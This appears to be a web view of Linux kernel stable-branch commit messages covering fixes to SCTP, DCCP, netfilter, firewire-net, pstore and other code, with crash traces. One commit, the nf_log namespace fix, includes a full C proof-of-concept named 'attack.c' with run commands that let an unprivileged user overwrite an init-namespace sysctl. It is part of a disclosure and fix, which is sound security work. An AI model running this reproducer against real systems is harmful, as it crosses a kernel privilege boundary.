      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      4d4c1fc6
    • Marcelo Ricardo Leitner's avatar
      sctp: assign assoc_id earlier in __sctp_connect · 5b97e5f3
      Marcelo Ricardo Leitner authored
      commit 7233bc84 upstream.
      
      sctp_wait_for_connect() currently already holds the asoc to keep it
      alive during the sleep, in case another thread release it. But Andrey
      Konovalov and Dmitry Vyukov reported an use-after-free in such
      situation.
      
      Problem is that __sctp_connect() doesn't get a ref on the asoc and will
      do a read on the asoc after calling sctp_wait_for_connect(), but by then
      another thread may have closed it and the _put on sctp_wait_for_connect
      will actually release it, causing the use-after-free.
      
      Fix is, instead of doing the read after waiting for the connect, do it
      before so, and avoid this issue as the socket is still locked by then.
      There should be no issue on returning the asoc id in case of failure as
      the application shouldn't trust on that number in such situations
      anyway.
      
      This issue doesn't exist in sctp_sendmsg() path.
      Reported-by: default avatarDmitry Vyukov <dvyukov@google.com>
      Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarMarcelo Ricardo Leitner <marcelo.leitner@gmail.com>
      Reviewed-by: default avatarXin Long <lucien.xin@gmail.com>
      Acked-by: default avatarNeil Horman <nhorman@tuxdriver.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      5b97e5f3
    • Eric Dumazet's avatar
      dccp: fix out of bound access in dccp_v4_err() · 261def57
      Eric Dumazet authored
      commit 6706a97f upstream.
      
      dccp_v4_err() does not use pskb_may_pull() and might access garbage.
      
      We only need 4 bytes at the beginning of the DCCP header, like TCP,
      so the 8 bytes pulled in icmp_socket_deliver() are more than enough.
      
      This patch might allow to process more ICMP messages, as some routers
      are still limiting the size of reflected bytes to 28 (RFC 792), instead
      of extended lengths (RFC 1812 4.3.2.3)
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      261def57
    • Eric Dumazet's avatar
      dccp: do not send reset to already closed sockets · 7507bf35
      Eric Dumazet authored
      commit 346da62c upstream.
      
      Andrey reported following warning while fuzzing with syzkaller
      
      WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
      Kernel panic - not syncing: panic_on_warn set ...
      
      CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
       ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
       ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
       0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
      Call Trace:
       [<     inline     >] __dump_stack lib/dump_stack.c:15
       [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
       [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
       [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
       [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
       [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
       [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
       [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
       [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
       [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
       [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
       [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
       [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
       [<     inline     >] exit_task_work include/linux/task_work.h:21
       [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
       [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
       [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
       [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
       [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
      arch/x86/entry/common.c:156
       [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
       [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
      arch/x86/entry/common.c:259
       [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
      Dumping ftrace buffer:
         (ftrace buffer empty)
      Kernel Offset: disabled
      
      Fix this the same way we did for TCP in commit 565b7b2d
      ("tcp: do not send reset to already closed sockets")
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      7507bf35
    • Eric Dumazet's avatar
      net: mangle zero checksum in skb_checksum_help() · 985f2772
      Eric Dumazet authored
      commit 4f2e4ad5 upstream.
      
      Sending zero checksum is ok for TCP, but not for UDP.
      
      UDPv6 receiver should by default drop a frame with a 0 checksum,
      and UDPv4 would not verify the checksum and might accept a corrupted
      packet.
      
      Simply replace such checksum by 0xffff, regardless of transport.
      
      This error was caught on SIT tunnels, but seems generic.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Cc: Maciej Żenczykowski <maze@google.com>
      Cc: Willem de Bruijn <willemb@google.com>
      Acked-by: default avatarMaciej Żenczykowski <maze@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      985f2772
    • Eric Dumazet's avatar
      net: clear sk_err_soft in sk_clone_lock() · 9385be2e
      Eric Dumazet authored
      commit e551c32d upstream.
      
      At accept() time, it is possible the parent has a non zero
      sk_err_soft, leftover from a prior error.
      
      Make sure we do not leave this value in the child, as it
      makes future getsockopt(SO_ERROR) calls quite unreliable.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Acked-by: default avatarSoheil Hassas Yeganeh <soheil@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      9385be2e
    • Marcelo Ricardo Leitner's avatar
      sctp: validate chunk len before actually using it · 0058a4c1
      Marcelo Ricardo Leitner authored
      commit bf911e98 upstream.
      
      Andrey Konovalov reported that KASAN detected that SCTP was using a slab
      beyond the boundaries. It was caused because when handling out of the
      blue packets in function sctp_sf_ootb() it was checking the chunk len
      only after already processing the first chunk, validating only for the
      2nd and subsequent ones.
      
      The fix is to just move the check upwards so it's also validated for the
      1st chunk.
      Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarMarcelo Ricardo Leitner <marcelo.leitner@gmail.com>
      Reviewed-by: default avatarXin Long <lucien.xin@gmail.com>
      Acked-by: default avatarNeil Horman <nhorman@tuxdriver.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      0058a4c1
    • Jiri Slaby's avatar
      net: sctp, forbid negative length · 2b8ed05b
      Jiri Slaby authored
      commit a4b8e71b upstream.
      
      Most of getsockopt handlers in net/sctp/socket.c check len against
      sizeof some structure like:
              if (len < sizeof(int))
                      return -EINVAL;
      
      On the first look, the check seems to be correct. But since len is int
      and sizeof returns size_t, int gets promoted to unsigned size_t too. So
      the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
      false.
      
      Fix this in sctp by explicitly checking len < 0 before any getsockopt
      handler is called.
      
      Note that sctp_getsockopt_events already handled the negative case.
      Since we added the < 0 check elsewhere, this one can be removed.
      
      If not checked, this is the result:
      UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
      shift exponent 52 is too large for 32-bit type 'int'
      CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
       0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
       ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
       0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
      Call Trace:
       [<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
      ...
       [<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
       [<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
       [<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
       [<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
       [<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
       [<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
       [<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      Cc: Vlad Yasevich <vyasevich@gmail.com>
      Cc: Neil Horman <nhorman@tuxdriver.com>
      Cc: "David S. Miller" <davem@davemloft.net>
      Cc: linux-sctp@vger.kernel.org
      Cc: netdev@vger.kernel.org
      Acked-by: default avatarNeil Horman <nhorman@tuxdriver.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      2b8ed05b
    • Anoob Soman's avatar
      packet: call fanout_release, while UNREGISTERING a netdev · 5e6212f7
      Anoob Soman authored
      commit 66644982 upstream.
      
      If a socket has FANOUT sockopt set, a new proto_hook is registered
      as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
      af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
      registered as part of fanout_add is not removed. Call fanout_release, on a
      NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
      fanout_list.
      
      This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()
      Signed-off-by: default avatarAnoob Soman <anoob.soman@citrix.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      5e6212f7
    • Nikolay Aleksandrov's avatar
      ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route · 2943dca4
      Nikolay Aleksandrov authored
      commit 2cf75070 upstream.
      
      Since the commit below the ipmr/ip6mr rtnl_unicast() code uses the portid
      instead of the previous dst_pid which was copied from in_skb's portid.
      Since the skb is new the portid is 0 at that point so the packets are sent
      to the kernel and we get scheduling while atomic or a deadlock (depending
      on where it happens) by trying to acquire rtnl two times.
      Also since this is RTM_GETROUTE, it can be triggered by a normal user.
      
      Here's the sleeping while atomic trace:
      [ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
      [ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
      [ 7858.212881] 2 locks held by swapper/0/0:
      [ 7858.213013]  #0:  (((&mrt->ipmr_expire_timer))){+.-...}, at: [<ffffffff810fbbf5>] call_timer_fn+0x5/0x350
      [ 7858.213422]  #1:  (mfc_unres_lock){+.....}, at: [<ffffffff8161e005>] ipmr_expire_process+0x25/0x130
      [ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
      [ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
      [ 7858.214108]  0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
      [ 7858.214412]  ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
      [ 7858.214716]  000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
      [ 7858.215251] Call Trace:
      [ 7858.215412]  <IRQ>  [<ffffffff813a7804>] dump_stack+0x85/0xc1
      [ 7858.215662]  [<ffffffff810a4a72>] ___might_sleep+0x192/0x250
      [ 7858.215868]  [<ffffffff810a4b9f>] __might_sleep+0x6f/0x100
      [ 7858.216072]  [<ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
      [ 7858.216279]  [<ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
      [ 7858.216487]  [<ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
      [ 7858.216687]  [<ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
      [ 7858.216900]  [<ffffffff81573c70>] rtnl_unicast+0x20/0x30
      [ 7858.217128]  [<ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
      [ 7858.217351]  [<ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
      [ 7858.217581]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.217785]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.217990]  [<ffffffff810fbc95>] call_timer_fn+0xa5/0x350
      [ 7858.218192]  [<ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
      [ 7858.218415]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.218656]  [<ffffffff810fde10>] run_timer_softirq+0x260/0x640
      [ 7858.218865]  [<ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
      [ 7858.219068]  [<ffffffff816637c8>] __do_softirq+0xe8/0x54f
      [ 7858.219269]  [<ffffffff8107a948>] irq_exit+0xb8/0xc0
      [ 7858.219463]  [<ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
      [ 7858.219678]  [<ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
      [ 7858.219897]  <EOI>  [<ffffffff81055f16>] ? native_safe_halt+0x6/0x10
      [ 7858.220165]  [<ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
      [ 7858.220373]  [<ffffffff810298e3>] default_idle+0x23/0x190
      [ 7858.220574]  [<ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
      [ 7858.220790]  [<ffffffff810c9f8c>] default_idle_call+0x4c/0x60
      [ 7858.221016]  [<ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
      [ 7858.221257]  [<ffffffff8164f995>] rest_init+0x135/0x140
      [ 7858.221469]  [<ffffffff81f83014>] start_kernel+0x50e/0x51b
      [ 7858.221670]  [<ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
      [ 7858.221894]  [<ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
      [ 7858.222113]  [<ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a
      
      Fixes: 2942e900 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
      Signed-off-by: default avatarNikolay Aleksandrov <nikolay@cumulusnetworks.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      2943dca4
    • Eric Dumazet's avatar
      net: avoid sk_forward_alloc overflows · 9864f153
      Eric Dumazet authored
      commit 20c64d5c upstream.
      
      A malicious TCP receiver, sending SACK, can force the sender to split
      skbs in write queue and increase its memory usage.
      
      Then, when socket is closed and its write queue purged, we might
      overflow sk_forward_alloc (It becomes negative)
      
      sk_mem_reclaim() does nothing in this case, and more than 2GB
      are leaked from TCP perspective (tcp_memory_allocated is not changed)
      
      Then warnings trigger from inet_sock_destruct() and
      sk_stream_kill_queues() seeing a not zero sk_forward_alloc
      
      All TCP stack can be stuck because TCP is under memory pressure.
      
      A simple fix is to preemptively reclaim from sk_mem_uncharge().
      
      This makes sure a socket wont have more than 2 MB forward allocated,
      after burst and idle period.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      9864f153
    • Eric Dumazet's avatar
      net: fix sk_mem_reclaim_partial() · a5b79829
      Eric Dumazet authored
      commit 1a24e04e upstream.
      
      sk_mem_reclaim_partial() goal is to ensure each socket has
      one SK_MEM_QUANTUM forward allocation. This is needed both for
      performance and better handling of memory pressure situations in
      follow up patches.
      
      SK_MEM_QUANTUM is currently a page, but might be reduced to 4096 bytes
      as some arches have 64KB pages.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      a5b79829
    • Oliver Hartkopp's avatar
      can: bcm: fix warning in bcm_connect/proc_register · 4c1307b2
      Oliver Hartkopp authored
      commit deb507f9 upstream.
      
      Andrey Konovalov reported an issue with proc_register in bcm.c.
      As suggested by Cong Wang this patch adds a lock_sock() protection and
      a check for unsuccessful proc_create_data() in bcm_connect().
      
      Reference: http://marc.info/?l=linux-netdev&m=147732648731237Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Suggested-by: default avatarCong Wang <xiyou.wangcong@gmail.com>
      Signed-off-by: default avatarOliver Hartkopp <socketcan@hartkopp.net>
      Acked-by: default avatarCong Wang <xiyou.wangcong@gmail.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarMarc Kleine-Budde <mkl@pengutronix.de>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      4c1307b2
    • Jann Horn's avatar
      netfilter: fix namespace handling in nf_log_proc_dostring · b53cc178
      Jann Horn authored
      commit dbb5918c upstream.
      
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: default avatarJann Horn <jann@thejh.net>
      Signed-off-by: default avatarPablo Neira Ayuso <pablo@netfilter.org>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      b53cc178
    • Stefan Richter's avatar
      firewire: net: fix fragmented datagram_size off-by-one · 3ca5f495
      Stefan Richter authored
      commit e9300a4b upstream.
      
      RFC 2734 defines the datagram_size field in fragment encapsulation
      headers thus:
      
          datagram_size:  The encoded size of the entire IP datagram.  The
          value of datagram_size [...] SHALL be one less than the value of
          Total Length in the datagram's IP header (see STD 5, RFC 791).
      
      Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
      this field with a -/+1 offset:
      
          ether1394_tx() /* transmit */
              ether1394_encapsulate_prep()
                  hdr->ff.dg_size = dg_size - 1;
      
          ether1394_data_handler() /* receive */
              if (hdr->common.lf == ETH1394_HDR_LF_FF)
                  dg_size = hdr->ff.dg_size + 1;
              else
                  dg_size = hdr->sf.dg_size + 1;
      
      Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
      byte sized datagrams in fragments with datagram_size=1499 if link
      fragmentation is required.
      
      Only firewire-net sets and gets datagram_size without this offset.  The
      result is lacking interoperability of firewire-net with OS X, Windows
      XP, and presumably Linux' eth1394.  (I did not test with the latter.)
      For example, FTP data transfers to a Linux firewire-net box with max_rec
      smaller than the 1500 bytes MTU
        - from OS X fail entirely,
        - from Win XP start out with a bunch of fragmented datagrams which
          time out, then continue with unfragmented datagrams because Win XP
          temporarily reduces the MTU to 576 bytes.
      
      So let's fix firewire-net's datagram_size accessors.
      
      Note that firewire-net thereby loses interoperability with unpatched
      firewire-net, but only if link fragmentation is employed.  (This happens
      with large broadcast datagrams, and with large datagrams on several
      FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
      and it can be worked around by setting a small enough MTU.)
      Signed-off-by: default avatarStefan Richter <stefanr@s5r6.in-berlin.de>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3ca5f495
    • Stefan Richter's avatar
      firewire: net: guard against rx buffer overflows · 1d4353bd
      Stefan Richter authored
      commit 667121ac upstream.
      
      The IP-over-1394 driver firewire-net lacked input validation when
      handling incoming fragmented datagrams.  A maliciously formed fragment
      with a respectively large datagram_offset would cause a memcpy past the
      datagram buffer.
      
      So, drop any packets carrying a fragment with offset + length larger
      than datagram_size.
      
      In addition, ensure that
        - GASP header, unfragmented encapsulation header, or fragment
          encapsulation header actually exists before we access it,
        - the encapsulated datagram or fragment is of nonzero size.
      Reported-by: default avatarEyal Itkin <eyal.itkin@gmail.com>
      Reviewed-by: default avatarEyal Itkin <eyal.itkin@gmail.com>
      Fixes: CVE 2016-8633
      Signed-off-by: default avatarStefan Richter <stefanr@s5r6.in-berlin.de>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      1d4353bd
    • Jack Morgenstein's avatar
      net/mlx4_core: Allow resetting VF admin mac to zero · afe6ced9
      Jack Morgenstein authored
      commit 6e522422 upstream.
      
      The VF administrative mac addresses (stored in the PF driver) are
      initialized to zero when the PF driver starts up.
      
      These addresses may be modified in the PF driver through ndo calls
      initiated by iproute2 or libvirt.
      
      While we allow the PF/host to change the VF admin mac address from zero
      to a valid unicast mac, we do not allow restoring the VF admin mac to
      zero. We currently only allow changing this mac to a different unicast mac.
      
      This leads to problems when libvirt scripts are used to deal with
      VF mac addresses, and libvirt attempts to revoke the mac so this
      host will not use it anymore.
      
      Fix this by allowing resetting a VF administrative MAC back to zero.
      
      Fixes: 8f7ba3ca ('net/mlx4: Add set VF mac address support')
      Signed-off-by: default avatarJack Morgenstein <jackm@dev.mellanox.co.il>
      Reported-by: default avatarMoshe Levi <moshele@mellanox.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarJuerg Haefliger <juerg.haefliger@hpe.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      afe6ced9
    • Liu ShuoX's avatar
      pstore: Fix buffer overflow while write offset equal to buffer size · 3a8930fd
      Liu ShuoX authored
      commit 017321cf upstream.
      
      In case new offset is equal to prz->buffer_size, it won't wrap at this
      time and will return old(overflow) value next time.
      Signed-off-by: default avatarLiu ShuoX <shuox.liu@intel.com>
      Acked-by: default avatarKees Cook <keescook@chromium.org>
      Signed-off-by: default avatarTony Luck <tony.luck@intel.com>
      Signed-off-by: default avatarWilly Tarreau <w@1wt.eu>
      3a8930fd